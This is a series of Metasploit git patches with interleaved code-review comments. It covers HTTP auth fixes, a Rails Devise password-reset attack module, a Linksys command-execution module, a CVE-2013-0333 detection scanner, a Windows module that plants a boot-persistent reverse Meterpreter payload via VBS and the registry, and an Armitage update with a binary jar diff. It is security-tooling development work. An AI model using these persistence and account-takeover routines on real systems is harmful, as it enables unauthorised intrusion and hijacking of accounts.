@@ -107,10 +103,8 @@ def do_login(user='tomcat', pass='tomcat') res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } + 'username' => user, + 'password' => pass }, 25) unless (res.kind_of? Rex::Proto::Http::Response) vprint_error("http://#{rhost}:#{rport}#{uri} not responding") From 0ccf7dd58a0ebe908f745045f1b6ac3837781799 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 11 Feb 2013 13:06:26 -0600 Subject: [PATCH 355/421] trust any manualy set basic auth header for now we will assume the module author knows what they are doing. --- lib/rex/proto/http/client.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 41adf30aedce..3f85ddd9f888 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -209,7 +209,9 @@ def request_raw(opts={}) req << set_agent_header(c_ag) if (c_auth.length > 0) - req << set_basic_auth_header(c_auth) + unless c_head['Authorization'].include? "Basic" + req << set_basic_auth_header(c_auth) + end end req << set_cookie_header(c_cook) @@ -315,7 +317,9 @@ def request_cgi(opts={}) req << set_agent_header(c_ag) if (c_auth.length > 0) - req << set_basic_auth_header(c_auth) + unless c_head['Authorization'].include? "Basic" + req << set_basic_auth_header(c_auth) + end end req << set_cookie_header(c_cook) From f90fdcd5eba83df46b8f677498459df47bf3c077 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 11 Feb 2013 13:14:05 -0600 Subject: [PATCH 356/421] Missed nil check --- lib/rex/proto/http/client.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 3f85ddd9f888..75ba1f957492 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb 
@@ -209,7 +209,7 @@ def request_raw(opts={}) req << set_agent_header(c_ag) if (c_auth.length > 0) - unless c_head['Authorization'].include? "Basic" + unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" req << set_basic_auth_header(c_auth) end end @@ -317,7 +317,7 @@ def request_cgi(opts={}) req << set_agent_header(c_ag) if (c_auth.length > 0) - unless c_head['Authorization'].include? "Basic" + unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" req << set_basic_auth_header(c_auth) end end From 753fa2c85324b3881c5475809b15129c7f5ee64f Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 11 Feb 2013 13:58:56 -0600 Subject: [PATCH 357/421] Handles error when TARGETEMAIL is invalid. --- .../admin/http/rails_devise_pass_reset.rb | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index ac2a3d894203..e6898a57973d 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -7,6 +7,7 @@ require 'msf/core' require 'rexml/element' +require 'pry' class Metasploit3 < Msf::Auxiliary @@ -67,6 +68,15 @@ def generate_token(account) 'method' => 'POST', 'data' => postdata, }) + + if res.code == 200 + error_text = res.body[/<div id=\"error_explanation\">\n\s+(.*?)<\/div>/m, 1] + print_error("Server returned an error:") + print_error(error_text) + return false + end + return true + #binding.pry end def clear_tokens() @@ -100,8 +110,6 @@ def reset_one(password, report=false) 'data' => xml, }) - #binding.pry if report - case res.code when 200 # Failure, grab the error text 
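Review bot: The guard `unless c_head['Authorization'] and c_head['Authorization'].include? "Basic"` in the `request_raw` hunk, and the identical line in the `request_cgi` hunk, is a case-sensitive substring test. A caller-supplied header with a different scheme, or with `basic` in lower case, therefore still falls through to `set_basic_auth_header(c_auth)`, and the request would presumably carry two Authorization headers. If the intent is to trust any manually set header, a presence test is enough: `unless c_head['Authorization']`. If only Basic should suppress the generated header, anchor the match and ignore case: `unless c_head['Authorization'].to_s =~ /\Abasic\s/i`. Both methods start and end outside their hunks, so how `c_head` is keyed and emitted is not visible here.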
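Review bot: `res.code == 200` in the `generate_token` hunk of rails_devise_pass_reset.rb runs without checking that a response came back. Other callers on this page guard the result of `send_request_cgi` (`unless res1`, `res.kind_of? Rex::Proto::Http::Response`), so a timeout here would presumably raise NoMethodError on nil. A guard before the comparison covers it: `unless res` / `print_error("No response from server")` / `return false`. `error_text` is also nil when the body has no `error_explanation` div, so `print_error(error_text)` should be `print_error(error_text) if error_text`. `generate_token` starts outside the hunk.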
@@ -132,7 +140,12 @@ def run clear_tokens() if datastore['FLUSHTOKENS'] # Generate a token for our account - generate_token(datastore['TARGETEMAIL']) + status = generate_token(datastore['TARGETEMAIL']) + if status == false + print_error("Failed") + return + end + print_good("Success") # Reset a password. We're racing users creating other reset tokens. # If we didn't flush, we'll reset the account with the lowest ID that has a token. From 5f0a3c6b9e3dca51cb68aa39f413a7affcab2ebd Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 11 Feb 2013 14:02:46 -0600 Subject: [PATCH 358/421] Removes pry, oops. --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index e6898a57973d..6445c286be72 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -7,7 +7,6 @@ require 'msf/core' require 'rexml/element' -require 'pry' class Metasploit3 < Msf::Auxiliary @@ -76,7 +75,6 @@ def generate_token(account) return false end return true - #binding.pry end def clear_tokens() From 766257d26ac6ca2c08dabf42af7fec06998480bb Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 11 Feb 2013 21:21:43 +0100 Subject: [PATCH 359/421] pointed by @m-1-k-3 while working on #1472 --- modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index 2c99d9c9f41c..189f937ea1ab 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb 
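Review bot: The messages added in the `run` hunk, `print_error("Failed")` and `print_good("Success")`, do not say which step they refer to, although `run` goes on to the reset attempts right after. Naming the step keeps the log readable, e.g. `print_error("Could not generate a reset token for #{datastore['TARGETEMAIL']}")`. The comparison `if status == false` is more idiomatic as `unless generate_token(datastore['TARGETEMAIL'])`, which also treats a nil return as failure. `run` starts and ends outside the hunk.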
@@ -136,7 +136,7 @@ def run res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', - 'basic_auth' => "#{pass}:#{pass}", + 'basic_auth' => "#{user}:#{pass}", #'data' => data_cmd, 'vars_post' => { From ddd7d307e6e5f917744e0b2c8da59eb79667b103 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 11 Feb 2013 16:48:44 -0600 Subject: [PATCH 360/421] Add a scanner aux module for Rails JSON/YAML vuln CVE-2013-0333 --- .../scanner/http/rails_json_yaml_scanner.rb | 101 ++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb new file mode 100644 index 000000000000..64c67cf86b25 --- /dev/null +++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb 
@@ -0,0 +1,101 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Scanner', + 'Description' => %q{ + This module attempts to identify Ruby on Rails instances vulnerable to + an arbitrary object instantiation flaw in the JSON request processor. + }, + 'Author' => [ + 'jjarmoc', # scanner module + 'hdm' # CVE-2013-0156 scanner, basis of this technique. + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2013-0333'], + ] + )) + + register_options([ + OptString.new('URIPATH', [true, "The URI to test", "/"]), + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT']]), + ], self.class) + end + + def send_probe(pdata) + res = send_request_cgi({ + 'uri' => datastore['URIPATH'] || "/", + 'method' => datastore['HTTP_METHOD'], + 'ctype' => 'application/json', + 'data' => pdata + }, 25) + end + + def run_host(ip) + + # Straight JSON as a baseline + res1 = send_probe( + "{ \"#{Rex::Text.rand_text_alpha(rand(8)+1)}\" : \"#{Rex::Text.rand_text_alpha(rand(8)+1)}\" }" + ) + + unless res1 + vprint_status("#{rhost}:#{rport} No reply to the initial JSON request") + return + end + + if res1.code.to_s =~ /^[5]/ + print_error("#{rhost}:#{rport} The server replied with #{res1.code} for our initial JSON request") + print_error("\t\tDouble check URIPATH and HTTP_METHOD") + return + end + + # Deserialize a hash, this should work if YAML deserializes. 
+ res2 = send_probe("--- {}\n".gsub(':', '\u003a')) + + unless res2 + vprint_status("#{rhost}:#{rport} No reply to the initial YAML probe") + return + end + + # Deserialize a malformed object, inducing an error. + res3 = send_probe("--- !ruby/object:\x00".gsub(':', '\u003a')) + + unless res3 + vprint_status("#{rhost}:#{rport} No reply to the second YAML probe") + return + end + + vprint_status("Probe response codes: #{res1.code} / #{res2.code} / #{res3.code}") + + if (res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200) + # If first and second requests are the same, and the third is different but not a 200, we're vulnerable. + print_good("#{rhost}:#{rport} is likely vulnerable due to a #{res3.code} reply for invalid YAML") + report_vuln({ + :host => rhost, + :port => rport, + :proto => 'tcp', + :name => self.name, + :info => "Module triggered a #{res3.code} reply", + :refs => self.references + }) + else + # Otherwise we're not likely vulnerable. + vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH must be set") + end + end + +end \ No newline at end of file From 97edbb786898e3edaab81b6c77b0cbef99397779 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Tue, 12 Feb 2013 00:58:26 +0100 Subject: [PATCH 361/421] using always a vbs file to drop exe --- modules/exploits/windows/local/persistence.rb | 46 +++---------------- 1 file changed, 7 insertions(+), 39 deletions(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 126b94e3f596..bdf9e7b822f7 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb 
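Review bot: `report_vuln` in `run_host` of the new rails_json_yaml_scanner.rb fires purely on how the three status codes compare, yet the stored `:info` keeps only `res3.code`. Recording all three, `:info => "Probe codes #{res1.code}/#{res2.code}/#{res3.code}"`, lets whoever triages the finding see why the host was flagged and judge whether it is a false positive. The baseline check `res1.code.to_s =~ /^[5]/` reads more clearly as a numeric test, `if (500..599).include?(res1.code)`. In `send_probe` the local `res =` is never read, so the assignment can go. The file also ends without a trailing newline.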
@@ -59,28 +59,19 @@ def initialize(info={}) def exploit print_status("Running module against #{sysinfo['Computer']}") - rexe = datastore['EXE::Custom'] rexename = datastore['REXENAME'] delay = datastore['DELAY'] reg_val = datastore['REG_NAME'] - template_pe = datastore['EXE::Template'] @clean_up_rc = "" host,port = session.session_host, session.session_port - if rexe.nil? - script = create_script(delay, template_pe) - script_on_target = write_script_to_target(script,rexename) - if script_on_target == nil - # exit the module because we failed to write the file on the target host. - return - end - else - alt_pay_exe = get_custom_exe - script_on_target = write_exe_to_target(alt_pay_exe, rexename) - if script_on_target == nil - # exit the module because we failed to write the file on the target host. - return - end + exe = generate_payload_exe + script = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay}) + script_on_target = write_script_to_target(script,rexename) + + if script_on_target == nil + # exit the module because we failed to write the file on the target host. + return end # Initial execution of script @@ -228,27 +219,4 @@ def write_to_reg(key,script_on_target, registry_value) end end - # Writesexecutable to target host - #------------------------------------------------------------------------------- - def write_exe_to_target(exe_raw, rexename) - if rexename.nil? - exe_name = Rex::Text.rand_text_alpha(rand(8)+8) - else - exe_name = rexename - end - - tempdir = session.fs.file.expand_path("%TEMP%") - tempexe = tempdir + "\\" + exe_name + ".exe" - begin - fd = session.fs.file.new(tempexe, "wb") - fd.write(exe_raw) - fd.close - print_good("Persistent executable written to #{tempexe}") - @clean_up_rc << "rm #{tempexe}\n" - rescue - print_error("Failed to write the payload on the target.") - tempexe = nil - end - return tempexe - end end From 42a6d96ff45a4e6eb1303328698d51a9ef502d95 Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Tue, 12 Feb 2013 01:33:07 +0100 Subject: [PATCH 362/421] using Post::File methods plus little more cleanup --- modules/exploits/windows/local/persistence.rb | 28 +++---------------- 1 file changed, 4 insertions(+), 24 deletions(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index bdf9e7b822f7..4c2dcaca1fc2 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -26,11 +26,10 @@ def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Persistent Payload Installer', 'Description' => %q{ - This Module will create a boot persistent reverse Meterpreter session by + This Module will create a boot persistent reverse Meterpreter session by installing on the target host the payload as a script that will be executed at user logon or system startup depending on privilege and selected startup method. - }, 'License' => MSF_LICENSE, 'Author' => @@ -54,8 +53,7 @@ def initialize(info={}) end - # Exploit Method for when run command is issued - #------------------------------------------------------------------------------- + # Exploit Method for when exploit command is issued def exploit print_status("Running module against #{sysinfo['Computer']}") 
@@ -114,20 +112,7 @@ def exploit ) end - # Creates persistent script - #------------------------------------------------------------------------------- - def create_script(delay, altexe) - if not altexe.nil? - vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay, :template => altexe}) - else - vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay}) - end - print_status("Persistent agent script is #{vbs.length} bytes long") - return vbs - end - # Function for creating log folder and returning log path - #------------------------------------------------------------------------------- def log_file(log_path = nil) #Get hostname host = session.sys.config.sysinfo["Computer"] @@ -151,18 +136,15 @@ def log_file(log_path = nil) end # Writes script to target host - #------------------------------------------------------------------------------- def write_script_to_target(vbs,name) - tempdir = session.fs.file.expand_path("%TEMP%") + tempdir = expand_path("%TEMP%") if name == nil tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" else tempvbs = tempdir + "\\" + name + ".vbs" end begin - fd = session.fs.file.new(tempvbs, "wb") - fd.write(vbs) - fd.close + write_file(tempvbs, vbs) print_good("Persistent Script written to #{tempvbs}") @clean_up_rc << "rm #{tempvbs}\n" rescue @@ -174,7 +156,6 @@ def write_script_to_target(vbs,name) end # Executes script on target and return the PID of the process - #------------------------------------------------------------------------------- def target_exec(script_on_target) execsuccess = true print_status("Executing script #{script_on_target}") 
@@ -193,7 +174,6 @@ def target_exec(script_on_target) end # Installs payload in to the registry HKLM or HKCU - #------------------------------------------------------------------------------- def write_to_reg(key,script_on_target, registry_value) # Lets start to assume we had success. write_success = true From 596b62b831d0b1cf2d887c9f56b127f38bc5a179 Mon Sep 17 00:00:00 2001 
From: Raphael Mudge <rsmudge@gmail.com> Date: Mon, 11 Feb 2013 21:20:03 -0500 Subject: [PATCH 363/421] Armitage 02.12.13 - Distributed Operations This update adds the ability to manage multiple team server instances through one Armitage client. This update also adds nickname completion to the event log. Several bug fixes are included too. --- data/armitage/armitage.jar | Bin 3201422 -> 3213215 bytes data/armitage/cortana.jar | Bin 3201417 -> 3213210 bytes data/armitage/whatsnew.txt | 23 ++ external/source/armitage/resources/about.html | 2 +- .../armitage/scripts-cortana/internal.sl | 3 + external/source/armitage/scripts/armitage.sl | 24 +- .../source/armitage/scripts/collaborate.sl | 4 + external/source/armitage/scripts/gui.sl | 55 ++-- external/source/armitage/scripts/hosts.sl | 4 +- external/source/armitage/scripts/log.sl | 14 +- external/source/armitage/scripts/menus.sl | 14 +- external/source/armitage/scripts/passhash.sl | 45 +++- external/source/armitage/scripts/pivots.sl | 4 +- external/source/armitage/scripts/reporting.sl | 32 +-- external/source/armitage/scripts/server.sl | 61 ++--- external/source/armitage/scripts/targets.sl | 13 +- external/source/armitage/scripts/util.sl | 40 +-- .../src/armitage/ArmitageApplication.java | 43 +++- .../armitage/src/armitage/ArmitageBuffer.java | 138 ++++++++++ .../armitage/src/armitage/ArmitageMain.java | 35 ++- .../src/armitage/EventLogTabCompletion.java | 60 +++++ .../source/armitage/src/msf/DatabaseImpl.java | 10 +- .../source/armitage/src/msf/RpcAsync.java | 2 +- .../armitage/src/msf/RpcConnectionImpl.java | 28 +++ .../source/armitage/src/msf/RpcQueue.java | 2 +- .../armitage/src/table/NetworkTable.java | 16 +- .../source/armitage/src/ui/MultiFrame.java | 238 ++++++++++++++++++ external/source/armitage/whatsnew.txt | 23 ++ 28 files changed, 766 insertions(+), 167 deletions(-) create mode 100644 external/source/armitage/src/armitage/ArmitageBuffer.java create mode 100644 
external/source/armitage/src/armitage/EventLogTabCompletion.java create mode 100644 external/source/armitage/src/ui/MultiFrame.java 
diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index 153f8f95c0a3a630595e86b91d6525cd8b693519..81c949a109ac3c80b8d548f63b2d1a95ddbb839e 100755 GIT binary patch delta 119098 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 
